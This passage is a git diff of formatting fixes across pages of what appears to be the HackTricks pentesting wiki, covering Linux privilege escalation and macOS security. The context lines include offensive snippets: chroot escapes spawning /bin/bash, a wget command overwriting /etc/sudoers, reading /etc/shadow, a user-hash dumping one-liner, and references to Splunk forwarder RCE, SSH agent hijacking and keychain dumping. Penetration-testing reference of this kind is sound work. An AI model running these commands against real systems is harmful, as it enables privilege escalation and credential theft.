[**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug)\*\*\*\* +But obviously the exploitation will be **much easier locally**, as you can use a tool such as: [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug) ```bash #List possible vulnerable sockets diff --git a/linux-unix/privilege-escalation/escaping-from-limited-bash.md b/linux-unix/privilege-escalation/escaping-from-limited-bash.md index 9ac6f551..af8fcad3 100644 --- a/linux-unix/privilege-escalation/escaping-from-limited-bash.md +++ b/linux-unix/privilege-escalation/escaping-from-limited-bash.md @@ -27,7 +27,7 @@ int main(void) } chroot("."); system("/bin/bash"); -} +} ``` {% endcode %} @@ -41,7 +41,7 @@ os.chroot("chroot-dir") for i in range(1000): os.chdir("..") os.chroot(".") -os.system("/bin/bash") +os.system("/bin/bash") ``` Using **perl**: @@ -120,14 +120,14 @@ BASH_CMDS[shell]=/bin/bash;shell -i You can overwrite for example sudoers file ```bash -wget http://127.0.0.1:8080/sudoers -O /etc/sudoers +wget http://127.0.0.1:8080/sudoers -O /etc/sudoers ``` ### Other tricks [**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)\ -[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells\*\*]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\ -[https://gtfobins.github.io](https://gtfobins.github.io/\*\*]\(https/gtfobins.github.io)\ +[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells**]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\ +[https://gtfobins.github.io](https://gtfobins.github.io/**]\(https/gtfobins.github.io)\ **It could also be interesting the page:** {% content-ref url="../useful-linux-commands/bypass-bash-restrictions.md" %} diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md index aa318f99..894bc94f 100644 --- a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md @@ -98,7 +98,7 @@ So, read the file and try to **crack some hashes**. ## Disk Group - This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. +This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. Files:`/dev/sd[a-z][1-9]` diff --git a/linux-unix/privilege-escalation/ld.so.conf-example.md b/linux-unix/privilege-escalation/ld.so.conf-example.md index e53325b2..bc0ac7bf 100644 --- a/linux-unix/privilege-escalation/ld.so.conf-example.md +++ b/linux-unix/privilege-escalation/ld.so.conf-example.md @@ -40,7 +40,7 @@ void say_hi() 1. **Create** those files in your machine in the same folder 2. **Compile** the **library**: `gcc -shared -o libcustom.so -fPIC libcustom.c` -3. **Copy **_**** libcustom.so_ to _/usr/lib_: `sudo cp libcustom.so /usr/lib` (root privs) +3. **Copy **_ libcustom.so_ to _/usr/lib_: `sudo cp libcustom.so /usr/lib` (root privs) 4. **Compile** the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom` ### Check the environment @@ -111,7 +111,7 @@ ubuntu Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges. {% endhint %} -### Other misconfigurations - Same vuln +### Other misconfigurations - Same vuln In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.\ But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it. diff --git a/linux-unix/privilege-escalation/linux-capabilities.md b/linux-unix/privilege-escalation/linux-capabilities.md index 6e9073fa..55e3e3e0 100644 --- a/linux-unix/privilege-escalation/linux-capabilities.md +++ b/linux-unix/privilege-escalation/linux-capabilities.md @@ -764,7 +764,7 @@ And in order to read a file you could do: print(open("/etc/shadow", "r").read()) ``` -#### Example with \_\*\*\_Environment (Docker breakout) +#### Example with \_**\_Environment (Docker breakout) You can check the enabled capabilities inside the docker container using: @@ -1301,7 +1301,7 @@ It looks like we can only add to the inheritable set capabilities from the bound ### CAP\_SYS\_RAWIO -\*\*\*\*[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`. +[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`. This can be useful for **privilege escalation** and **Docker breakout.** diff --git a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index 6364555f..c91e9bc2 100644 --- a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -52,7 +52,7 @@ Another required requirement for the exploit to work is that **the export inside \--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_-- {% endhint %} -**Trick copied from** [**https://www.errno.fr/nfs\_privesc.html**](https://www.errno.fr/nfs\_privesc.html)**** +**Trick copied from** [**https://www.errno.fr/nfs\_privesc.html**](https://www.errno.fr/nfs\_privesc.html) Now, let’s assume that the share server still runs `no_root_squash` but there is something preventing us from mounting the share on our pentest machine. This would happen if the `/etc/exports` has an explicit list of IP addresses allowed to mount the share. diff --git a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md index e238d54b..b858bd87 100644 --- a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md +++ b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md @@ -6,7 +6,7 @@ Also if you are **already root and the Splunk service is not listening only on l In the first image below you can see how a Splunkd web page looks like. -**The following information was copied from** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)**** +**The following information was copied from** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/) ## Abusing Splunk Forwarders For Shells and Persistence @@ -145,4 +145,4 @@ Related blog posts: * https://medium.com/@airman604/splunk-universal-forwarder-hijacking-5899c3e0e6b2 * https://www.hurricanelabs.com/splunk-tutorials/using-splunk-as-an-offensive-security-tool -_\*\* Note: \*\*_ This issue is a serious issue with Splunk systems and it has been exploited by other testers for years. While Remote Code Execution is an intended feature of Splunk Universal Forwarder, the implimentaion of this is dangerous. I attempted to submit this bug via Splunk’s bug bounty program in the very unlikely chance they are not aware of the design implications, but was notified that any bug submissions implement the Bug Crowd/Splunk disclosure policy which states no details of the vulnerability may be discussed publically _ever_ without Splunk’s permission. I requested a 90 day disclosure timeline and was denied. As such, I did not responsibly disclose this since I am reasonably sure Splunk is aware of the issue and has chosen to ignore it, I feel this could severely impact companies, and it is the responsibility of the infosec community to educate businesses. +_** Note: **_ This issue is a serious issue with Splunk systems and it has been exploited by other testers for years. While Remote Code Execution is an intended feature of Splunk Universal Forwarder, the implimentaion of this is dangerous. I attempted to submit this bug via Splunk’s bug bounty program in the very unlikely chance they are not aware of the design implications, but was notified that any bug submissions implement the Bug Crowd/Splunk disclosure policy which states no details of the vulnerability may be discussed publically _ever_ without Splunk’s permission. I requested a 90 day disclosure timeline and was denied. As such, I did not responsibly disclose this since I am reasonably sure Splunk is aware of the issue and has chosen to ignore it, I feel this could severely impact companies, and it is the responsibility of the infosec community to educate businesses. diff --git a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md index c5f02dcc..545bcada 100644 --- a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md @@ -26,7 +26,7 @@ Another option, is that the user owner of the agent and root may be able to acce ## Long explanation and exploitation -**Taken from:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/)**** +**Taken from:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/) ### **When ForwardAgent Can’t Be Trusted** diff --git a/linux-unix/privilege-escalation/wildcards-spare-tricks.md b/linux-unix/privilege-escalation/wildcards-spare-tricks.md index b0a13c21..3c0ed6ad 100644 --- a/linux-unix/privilege-escalation/wildcards-spare-tricks.md +++ b/linux-unix/privilege-escalation/wildcards-spare-tricks.md @@ -59,6 +59,6 @@ ln -s /file/you/want/to/read root.txt Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content. -_More info in Write-ups of the box CTF from HackTheBox._ +_More info in Write-ups of the box CTF from HackTheBox._ __ diff --git a/macos/macos-security-and-privilege-escalation/README.md b/macos/macos-security-and-privilege-escalation/README.md index 562b3973..c2d1c359 100644 --- a/macos/macos-security-and-privilege-escalation/README.md +++ b/macos/macos-security-and-privilege-escalation/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -211,11 +211,11 @@ When the user first installs or runs your software, the presence of a ticket (ei ### File Quarantine Gatekeeper builds upon **File Quarantine.**\ -****Upon download of an application, a particular **extended file attribute** ("quarantine flag") can be **added** to the **downloaded** **file**. This attribute **is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software.\ +Upon download of an application, a particular **extended file attribute** ("quarantine flag") can be **added** to the **downloaded** **file**. This attribute **is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software.\ When a user executes a "quarantined" file, **Gatekeeper** is the one that **performs the mentioned actions** to allow the execution of the file. {% hint style="info" %} - **Checking** the **validity** of code signatures is a **resource-intensive** process that includes generating cryptographic **hashes** of the code and all its bundled resources. Furthermore, checking certificate validity involves doing an **online check** to Apple's servers to see if it has been revoked after it was issued. For these reasons, a full code signature and notarization check is **impractical to run every time an app is launched**. +**Checking** the **validity** of code signatures is a **resource-intensive** process that includes generating cryptographic **hashes** of the code and all its bundled resources. Furthermore, checking certificate validity involves doing an **online check** to Apple's servers to see if it has been revoked after it was issued. For these reasons, a full code signature and notarization check is **impractical to run every time an app is launched**. Therefore, these checks are **only run when executing apps with the quarantined attribute.** @@ -348,7 +348,7 @@ Bypasses examples: ### SIP - System Integrity Protection This protection was enabled to **help keep root level malware from taking over certain parts** of the operating system. Although this means **applying limitations to the root user** many find it to be worthwhile trade off.\ -The most notable of these limitations are that **users can no longer create, modify, or delete files inside** of the following four directories in general: +The most notable of these limitations are that **users can no longer create, modify, or delete files inside** of the following four directories in general: * /System * /bin @@ -391,7 +391,7 @@ System Integrity Protection status: enabled. ``` If you want to **disable** **it**, you need to put the computer in recovery mode (start it pressing command+R) and execute: `csrutil disable` \ -You can also maintain it **enable but without debugging protections** doing: +You can also maintain it **enable but without debugging protections** doing: ```bash csrutil enable --without debug @@ -418,7 +418,7 @@ spctl --assess --verbose /Applications/Safari.app ## Installed Software & Services -Check for **suspicious** applications installed and **privileges** over the.installed resources: +Check for **suspicious** applications installed and **privileges** over the.installed resources: ```bash system_profiler SPApplicationsDataType #Installed Apps @@ -839,7 +839,7 @@ The following oneliner can be use to dump **all the information about the users* for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done ``` -****[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**. +[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**. ### Keychain Dump @@ -876,7 +876,7 @@ Base on this comment [https://github.com/juuso/keychaindump/issues/10#issuecomme ### chainbreaker -****[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner: +[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner: * Hashed Keychain password, suitable for cracking with [hashcat](https://hashcat.net/hashcat/) or [John the Ripper](https://www.openwall.com/john/) * Internet Passwords @@ -977,11 +977,11 @@ This is like the [**LD\_PRELOAD on Linux**](../../linux-unix/privilege-escalatio This technique may be also **used as an ASEP technique** as every application installed has a plist called "Info.plist" that allows for the **assigning of environmental variables** using a key called `LSEnvironmental`. {% hint style="info" %} -Since 2012 when [OSX.FlashBack.B](https://www.f-secure.com/v-descs/trojan-downloader\_osx\_flashback\_b.shtml) \[22] abused this technique, **Apple has drastically reduced the “power”** of the DYLD\_INSERT\_LIBRARIES. +Since 2012 when [OSX.FlashBack.B](https://www.f-secure.com/v-descs/trojan-downloader\_osx\_flashback\_b.shtml) \[22] abused this technique, **Apple has drastically reduced the “power”** of the DYLD\_INSERT\_LIBRARIES. -For example the dynamic loader (dyld) ignores the DYLD\_INSERT\_LIBRARIES environment variable in a wide range of cases, such as setuid and platform binaries. And, starting with macOS Catalina, only 3rd-party applications that are not compiled with the hardened runtime (which “protects the runtime integrity of software” \[22]), or have an exception such as the com.apple.security.cs.allow-dyld-environment-variables entitlement) are susceptible to dylib insertions. +For example the dynamic loader (dyld) ignores the DYLD\_INSERT\_LIBRARIES environment variable in a wide range of cases, such as setuid and platform binaries. And, starting with macOS Catalina, only 3rd-party applications that are not compiled with the hardened runtime (which “protects the runtime integrity of software” \[22]), or have an exception such as the com.apple.security.cs.allow-dyld-environment-variables entitlement) are susceptible to dylib insertions. -For more details on the security features afforded by the hardened runtime, see Apple’s documentation: “[Hardened Runtime](https://developer.apple.com/documentation/security/hardened\_runtime)” +For more details on the security features afforded by the hardened runtime, see Apple’s documentation: “[Hardened Runtime](https://developer.apple.com/documentation/security/hardened\_runtime)” {% endhint %} ## Interesting Information in Databases @@ -1224,7 +1224,7 @@ sudo killall -HUP mDNSResponder ## References -* ****[**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)**** -* ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)**** -* ****[**https://github.com/NicolasGrimonpont/Cheatsheet**](https://github.com/NicolasGrimonpont/Cheatsheet)**** -* ****[**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)**** +* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) +* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) +* [**https://github.com/NicolasGrimonpont/Cheatsheet**](https://github.com/NicolasGrimonpont/Cheatsheet) +* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ) diff --git a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md index f310a565..7d3ce597 100644 --- a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md +++ b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md @@ -117,11 +117,11 @@ struct mach_header { Filetypes: -* MH\_EXECUTE (0x2): Standard Mach-O executable +* MH\_EXECUTE (0x2): Standard Mach-O executable * MH\_DYLIB (0x6): A Mach-O dynamic linked library (i.e. .dylib) * MH\_BUNDLE (0x8): A Mach-O bundle (i.e. .bundle) -#### **** +#### #### **Load commands** @@ -151,7 +151,7 @@ Common segments: * **`__DATA`**: Contains data that is **writable.** * `__data`: Global variables (that have been initialized) * `__bss`: Static variables (that have not been initialized) - * `__objc_*` (\_\_objc\_classlist, \_\_objc\_protolist, etc): Information used by the Objective-C runtime + * `__objc_*` (\_\_objc\_classlist, \_\_objc\_protolist, etc): Information used by the Objective-C runtime * **`__LINKEDIT`**: Contains information for the linker (dyld) such as, "symbol, string, and relocation table entries." * **`__OBJC`**: Contains information used by the Objective-C runtime. Though this information might also be found in the \_\_DATA segment, within various in \_\_objc\_\* sections. * **`LC_MAIN`**: Contains the entrypoint in the **entryoff attribute.** At load time, **dyld** simply **adds** this value to the (in-memory) **base of the binary**, then **jumps** to this instruction to kickoff execution of the binary’s code. @@ -187,7 +187,7 @@ A Mach-O binary can contain one or **more** **constructors**, that will be **exe The offsets of any constructors are held in the **\_\_mod\_init\_func** section of the **\_\_DATA\_CONST** segment. {% endhint %} -#### **** +#### #### **Data** @@ -219,12 +219,12 @@ ls -lR /Applications/Safari.app/Contents Contains **code-signing information** about the application (i.e., hashes, etc.). * `Contents/MacOS` - Contains the **application’s binary** (which is executed when the user double-clicks the application icon in the UI). + Contains the **application’s binary** (which is executed when the user double-clicks the application icon in the UI). * `Contents/Resources` - Contains **UI elements of the application**, such as images, documents, and nib/xib files (that describe various user interfaces). + Contains **UI elements of the application**, such as images, documents, and nib/xib files (that describe various user interfaces). * `Contents/Info.plist`\ - ****The application’s main “**configuration file.**” Apple notes that “the system relies on the presence of this file to identify relevant information about \[the] application and any related files”. + The application’s main “**configuration file.**” Apple notes that “the system relies on the presence of this file to identify relevant information about \[the] application and any related files”. * **Plist** **files** contains configuration information. You can find find information about the meaning of they plist keys in [https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html) * Pairs that may be of interest when analyzing an application include:\ @@ -271,5 +271,5 @@ There are some projects that allow to generate a binary executable by MacOS cont ## References -* ****[**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)**** -* ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)**** +* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=) +* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) diff --git a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md index 838ae9a0..17381285 100644 --- a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md +++ b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md @@ -11,7 +11,7 @@ otool -tv /bin/ps #Decompile application ### SuspiciousPackage -****[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) is a tool useful to inspect **.pkg** files (installers) and see what is inside before installing it.\ +[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) is a tool useful to inspect **.pkg** files (installers) and see what is inside before installing it.\ These installers have `preinstall` and `postinstall` bash scripts that malware authors usually abuse to **persist** **the** **malware**. ### hdiutil @@ -32,8 +32,8 @@ When a function is called in a binary that uses objective-C, the compiled code i The params this function expects are: -* The first parameter (**self**) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object (as a whole), whereas for an instance method, self will point to an instantiated instance of the class as an object. -* The second parameter, (**op**), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.** +* The first parameter (**self**) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object (as a whole), whereas for an instance method, self will point to an instantiated instance of the class as an object. +* The second parameter, (**op**), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.** * The remaining parameters are any **values that are required by the method** (op). | **Argument** | **Register** | **(for) objc\_msgSend** | @@ -148,11 +148,11 @@ sudo dtrace -s syscalls_info.d -c "cat /etc/hosts" ### ProcessMonitor -****[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is a very useful tool to check the process related actions a process is performing (for example, monitor which new processes a process is creating). +[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is a very useful tool to check the process related actions a process is performing (for example, monitor which new processes a process is creating). ### FileMonitor -****[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events. +[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events. ### fs\_usage @@ -165,7 +165,7 @@ fs_usage -w -f network curl #This tracks network actions ### TaskExplorer -****[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is useful to see the **libraries** used by a binary, the **files** it's using and the **network** connections.\ +[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is useful to see the **libraries** used by a binary, the **files** it's using and the **network** connections.\ It also checks the binary processes against **virustotal** and show information about the binary. ### lldb @@ -287,6 +287,6 @@ Or use `netstat` or `lsof` ## References -* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)**** -* ****[**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44)**** -* ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)**** +* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) +* [**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44) +* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md index 6b7c1e8c..f764433d 100644 --- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -106,7 +106,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi 5. Make the request 1. POST to [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) sending the data `{ "action": "RequestProfileConfiguration", "sn": "" }` 2. The JSON payload is encrypted using Absinthe (**`NACSign`**) - 3. All requests over HTTPs, built-in root certificates are used + 3. All requests over HTTPs, built-in root certificates are used ![](<../../../.gitbook/assets/image (566) (1).png>) diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md index 2771e627..3096a100 100644 --- a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md @@ -5,7 +5,7 @@ As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected. -**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe)**** +**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe) ## Reversing the process diff --git a/macos/macos-security-and-privilege-escalation/macos-protocols.md b/macos/macos-security-and-privilege-escalation/macos-protocols.md index 1be12bdb..a3c11279 100644 --- a/macos/macos-security-and-privilege-escalation/macos-protocols.md +++ b/macos/macos-security-and-privilege-escalation/macos-protocols.md @@ -12,7 +12,7 @@ Zero Configuration Networking, such as Bonjour provides: The device will get an **IP address in the range 169.254/16** and will check if any other device is using that IP address. If not, it will keep the IP address. Macs keeps an entry in their routing table for this subnet: `netstat -rn | grep 169` For DNS the **Multicast DNS (mDNS) protocol is used**. [**mDNS** **services** listen in port **5353/UDP**](../../pentesting/5353-udp-multicast-dns-mdns.md), use **regular DNS queries** and use the **multicast address 224.0.0.251** instead of sending the request just to an IP address. Any machine listening these request will respond, usually to a multicast address, so all the devices can update their tables.\ -Each device will **select its own name** when accessing the network, the device will choose a name **ended in .local** (might be based on the hostname or a completely random one). +Each device will **select its own name** when accessing the network, the device will choose a name **ended in .local** (might be based on the hostname or a completely random one). For **discovering services DNS Service Discovery (DNS-SD)** is used. @@ -77,5 +77,5 @@ sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.p ## References -* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)**** -* ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)**** +* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=) +* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) diff --git a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md index 8e3dd3f0..2830c6a0 100644 --- a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md +++ b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md @@ -44,8 +44,8 @@ dscl "/Active Directory/[Domain]/All Domains" ls / Also there are some tools prepared for MacOS to automatically enumerate the AD and play with kerberos: * [**Machound**](https://github.com/XMCyber/MacHound): MacHound is an extension to the Bloodhound audting tool allowing collecting and ingesting of Active Directory relationships on MacOS hosts. -* ****[**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target. -* ****[**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration. +* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target. +* [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration. ### Domain Information diff --git a/misc/basic-python/README.md b/misc/basic-python/README.md index 74b6f7cf..3ee840e5 100644 --- a/misc/basic-python/README.md +++ b/misc/basic-python/README.md @@ -10,7 +10,7 @@ The difference between a Tuple and a List is that the position of a value in a t ### Main operations -To raise a number you should do: 3\*\*2 (it isn't 3^2)\ +To raise a number you should do: 3**2 